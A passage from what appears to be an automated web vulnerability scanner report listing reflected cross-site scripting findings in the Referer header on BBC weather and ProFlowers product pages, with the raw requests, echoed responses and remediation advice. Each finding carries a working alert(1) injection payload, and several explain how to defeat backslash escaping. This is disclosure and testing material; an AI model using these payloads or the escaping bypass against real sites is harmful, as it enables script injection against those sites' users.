Cookie: rsi_segs=J08781_10042|J08781_10139|J08781_10216|J08781_10277; BBC-UID=048de0da76396d645de62f03e16c7e10505ea811e050412f32a9f0fcf600f7a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; BBCWCW=*********************8*London*0***********1*v54_3; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=ce60c'-alert(1)-'daeaea85a76

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:52:03 GMT
Keep-Alive: timeout=10, max=729
Connection: close
X-Powered-By: PHP/5.2.5
Content-Length: 59337


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292529154000,
       editionToServe: null,
       queryString: 'loc=2389',
       referrer: 'http://www.google.com/search?hl=en&amp;q=ce60c'-alert(1)-'daeaea85a76',
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/2389/',
       country: 'us',
...[SNIP]...

2.115. http://news.bbc.co.uk/weather/forecast/4296/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/4296/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0691'-alert(1)-'acd8aef2374 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/4296/ HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10042|J08781_10139|J08781_10216|J08781_10277; BBC-UID=048de0da76396d645de62f03e16c7e10505ea811e050412f32a9f0fcf600f7a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; BBCWCW=*********************8*London*0***********1*v54_3; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=a0691'-alert(1)-'acd8aef2374

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Date: Thu, 16 Dec 2010 19:52:05 GMT
Keep-Alive: timeout=10, max=740
Connection: close
X-Powered-By: PHP/5.2.5
Age: 29
Content-Length: 59454


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292529154000,
       editionToServe: null,
       queryString: 'loc=4296',
       referrer: 'http://www.google.com/search?hl=en&amp;q=a0691'-alert(1)-'acd8aef2374',
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/4296/',
       country: 'us',
...[SNIP]...

2.116. http://news.bbc.co.uk/weather/forecast/8 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/8

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8221a'-alert(1)-'9685683ea2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/8 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8221a'-alert(1)-'9685683ea2

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:26:23 GMT
Keep-Alive: timeout=10, max=794
Connection: close
Set-Cookie: BBC-UID=a4ed80eaa6e9bc322e58acf7419052027126c25f7020a12aa45bdae5321185940Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:34:26 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a4ed80eaa6e9bc322e58acf7419052027126c25f7020a12aa45bdae5321185940Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:34:26 GMT; path=/; domain=bbc.co.uk;
X-Powered-By: PHP/5.2.5
X-Cache-Info: cached
Age: 483
Content-Length: 58448


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528066000,
       editionToServe: null,
       queryString: 'loc=8',
       referrer: 'http://www.google.com/search?hl=en&amp;q=8221a'-alert(1)-'9685683ea2',
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/8',
       country: 'us',
       m
...[SNIP]...

2.117. http://news.bbc.co.uk/weather/forecast/8/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/8/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b32fa'-alert(1)-'449dfb34b5c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/8/ HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10042|J08781_10139|J08781_10216|J08781_10277; BBC-UID=048de0da76396d645de62f03e16c7e10505ea811e050412f32a9f0fcf600f7a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; BBCWCW=*********************8*London*0***********1*v54_3; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=b32fa'-alert(1)-'449dfb34b5c

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:46:32 GMT
Keep-Alive: timeout=10, max=688
Connection: close
X-Powered-By: PHP/5.2.5
Content-Length: 59449


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292529151000,
       editionToServe: null,
       queryString: 'loc=8',
       referrer: 'http://www.google.com/search?hl=en&amp;q=b32fa'-alert(1)-'449dfb34b5c',
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/8/',
       country: 'us',
       
...[SNIP]...

2.118. http://products.proflowers.com/Birthday-Cupcake-30009626 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /Birthday-Cupcake-30009626

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0265\"%3balert(1)//eb233bb2f44 was submitted in the Referer HTTP header. This input was echoed as f0265\\";alert(1)//eb233bb2f44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /Birthday-Cupcake-30009626 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f0265\"%3balert(1)//eb233bb2f44

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=koroqgkb5yg4t2vcvi22g4tr; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=koroqgkb5yg4t2vcvi22g4tr; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pjt-1,cnd-32,pvo-2,pbr-4,psk-2,pps-1,poe-1,zzc-2,pjs-3,pcu-1,pfl-2,mpsmediapersonalitysplit-2,ntd-2,nte-3,ntc-1,peo-2,pfp-2,phr-1,zza-1,psv-3,nta-2,ntb-2,pmo-1,ppr-2,spg-1,xpc-1,psr-2,pcy-5,zzb-1,gfr-1,apg-2,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:57:20 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:57:20 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=60; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:57:20 GMT; path=/
Set-Cookie: PFC_BrowserId=10c03162-1ff7-4f4c-bf59-6cb9e12a66d9; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30009626&12/16/2010 11:57:23 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:57:23 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:57:24 GMT
Connection: close
Content-Length: 155460


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30009626","30009626","30009626","321133","60","organicgglgeneric_f0265\\";alert(1)//eb233bb2f44","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pfl-2,cnd-32,pvo-2,pbr-4,pcy-5,psk-2,poe-1,zzc-2,pjs-3,pcu-1,spg-1,mpsmediapersonalitysplit-2,ntd-2,nte-3,ntc-1,peo-2,pfp-2,phr-1,pjt-1,psv-3,
...[SNIP]...

2.119. http://products.proflowers.com/Christmas-Bouquet-with-Chocolates-30045477 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /Christmas-Bouquet-with-Chocolates-30045477

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e739d\"%3balert(1)//e6a08a07272 was submitted in the Referer HTTP header. This input was echoed as e739d\\";alert(1)//e6a08a07272 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /Christmas-Bouquet-with-Chocolates-30045477 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e739d\"%3balert(1)//e6a08a07272

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=ygbgtgioeslrr1e1cddmgass; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=ygbgtgioeslrr1e1cddmgass; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pjt-1,cnd-31,pvo-1,pbr-3,psk-1,pps-2,poe-2,zzc-2,pjs-1,pcu-1,pfl-2,mpsmediapersonalitysplit-1,ntd-2,nte-3,ntc-2,peo-1,pfp-2,phr-2,zza-2,psv-3,nta-2,ntb-1,pmo-1,ppr-2,spg-1,xpc-1,psr-2,pcy-5,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:56:52 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:56:52 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=57; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:56:52 GMT; path=/
Set-Cookie: PFC_BrowserId=95e1c787-ac3f-406c-94db-6441dd6184ef; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30045477&12/16/2010 11:56:54 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:56:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:56:55 GMT
Connection: close
Content-Length: 151876


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30045477","30045477","30045477","396232","57","organicgglgeneric_e739d\\";alert(1)//e6a08a07272","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pfl-2,cnd-31,pvo-1,pbr-3,pcy-5,psk-1,poe-2,zzc-2,pjs-1,pcu-1,spg-1,mpsmediapersonalitysplit-1,ntd-2,nte-3,ntc-2,peo-1,pfp-2,phr-2,pjt-1,psv-3,
...[SNIP]...

2.120. http://products.proflowers.com/Deluxe-Smiles-and-Sunshine-30007597 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /Deluxe-Smiles-and-Sunshine-30007597

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37220\"%3balert(1)//eec6a1f4673 was submitted in the Referer HTTP header. This input was echoed as 37220\\";alert(1)//eec6a1f4673 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /Deluxe-Smiles-and-Sunshine-30007597 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=37220\"%3balert(1)//eec6a1f4673

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=0it1nl1wcn23wgzn34pu5dii; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=0it1nl1wcn23wgzn34pu5dii; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pjt-2,cnd-31,pvo-1,pbr-4,psk-1,pps-2,poe-2,zzc-1,pjs-2,pcu-1,pfl-1,mpsmediapersonalitysplit-2,ntd-1,nte-2,ntc-2,peo-2,pfp-2,phr-2,zza-1,psv-3,nta-2,ntb-2,pmo-1,ppr-2,spg-1,xpc-1,psr-1,pcy-7,zzb-1,gfr-2,apg-2,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:56:58 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:56:58 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=26; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:56:58 GMT; path=/
Set-Cookie: PFC_BrowserId=9a206e74-49a3-4463-8ee9-6c8d489a95f2; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30007597&12/16/2010 11:56:59 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:56:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:57:00 GMT
Connection: close
Content-Length: 155833


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30007597","30007597","30007597","280810","26","organicgglgeneric_37220\\";alert(1)//eec6a1f4673","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pfl-1,cnd-31,pvo-1,pbr-4,pcy-7,psk-1,poe-2,zzc-1,pjs-2,pcu-1,spg-1,mpsmediapersonalitysplit-2,ntd-1,nte-2,ntc-2,peo-2,pfp-2,phr-2,pjt-2,psv-3,
...[SNIP]...

2.121. http://products.proflowers.com/Holiday-Treasures-wCherry-Red-Vase-30045179 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /Holiday-Treasures-wCherry-Red-Vase-30045179

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f44e\"%3balert(1)//ddcc2f8b062 was submitted in the Referer HTTP header. This input was echoed as 8f44e\\";alert(1)//ddcc2f8b062 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /Holiday-Treasures-wCherry-Red-Vase-30045179 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8f44e\"%3balert(1)//ddcc2f8b062

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=hg5mxlfhzjabyyjo2ruy0cpz; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=hg5mxlfhzjabyyjo2ruy0cpz; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pjt-1,cnd-34,pvo-2,pbr-4,psk-1,pps-2,poe-2,zzc-1,pjs-1,pcu-1,pfl-2,mpsmediapersonalitysplit-2,ntd-2,nte-2,ntc-2,peo-2,pfp-1,phr-1,zza-1,psv-4,nta-1,ntb-2,pmo-1,ppr-1,spg-2,xpc-1,psr-2,pcy-5,zzb-2,gfr-2,apg-1,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:56:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:56:59 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=87; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:56:59 GMT; path=/
Set-Cookie: PFC_BrowserId=11161508-6e97-402f-98e3-2964e214999a; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30045179&12/16/2010 11:57:01 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:57:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:57:02 GMT
Connection: close
Content-Length: 203052


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30045179","30045179","30045179","384794","87","organicgglgeneric_8f44e\\";alert(1)//ddcc2f8b062","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pfl-2,cnd-34,pvo-2,pbr-4,pcy-5,psk-1,poe-2,zzc-1,pjs-1,pcu-1,spg-2,mpsmediapersonalitysplit-2,ntd-2,nte-2,ntc-2,peo-2,pfp-1,phr-1,pjt-1,psv-4,
...[SNIP]...

2.122. http://products.proflowers.com/Smiles-and-Sunshine-30007596 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /Smiles-and-Sunshine-30007596

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be988\"%3balert(1)//631d415fd3 was submitted in the Referer HTTP header. This input was echoed as be988\\";alert(1)//631d415fd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /Smiles-and-Sunshine-30007596 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=be988\"%3balert(1)//631d415fd3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=bwy33wl0210hlx4hegr3eexg; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=bwy33wl0210hlx4hegr3eexg; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pjt-1,cnd-32,pvo-2,pbr-4,psk-2,pps-2,poe-1,zzc-1,pjs-3,pcu-1,pfl-1,mpsmediapersonalitysplit-1,ntd-1,nte-1,ntc-1,peo-1,pfp-2,phr-2,zza-1,psv-4,nta-1,ntb-2,pmo-1,ppr-2,spg-2,xpc-1,psr-1,pcy-8,zzb-1,gfr-1,apg-2,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:57:02 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:57:02 AM; domain=.proflowers.com; path=/
